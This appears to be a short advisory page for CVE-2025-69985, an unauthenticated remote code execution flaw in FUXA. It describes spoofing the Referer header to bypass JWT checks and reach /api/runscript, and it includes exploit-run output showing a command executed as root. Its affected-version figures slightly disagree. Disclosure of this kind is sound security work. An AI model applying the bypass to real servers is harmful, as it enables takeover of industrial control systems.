CVE-2025-69985:
FUXA Unauthenticated RCE
CVE-2025-69985 is a critical flaw in FUXA (up to 1.2.8) where the server/api/jwt-helper.js middleware mistakenly trusts the HTTP Referer header to decide whether a request is “internal.” By spoofing the Referer to match the server’s own host, a remote attacker can bypass JWT authentication without credentials. This can lead to unauthenticated remote code execution (RCE), meaning the attacker may be able to run commands on the server and potentially take over the FUXA instance and its data.
Target : http://localhost:1881 Command: whoami [*] Preparing payload → executing: whoami [*] Sending exploit request to /api/runscript ... [*] Response status: 200 [+] Command executed successfully (CVE-2025-69985 bypass)! === COMMAND OUTPUT === "root\n" ====================== ====================================================================== Exploit completed!. ======================================================================
"root\n"
9.8
Critical risk
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Compexity
low
Privileges
none
Affected
<1.2.10
Patched
>=1.2.10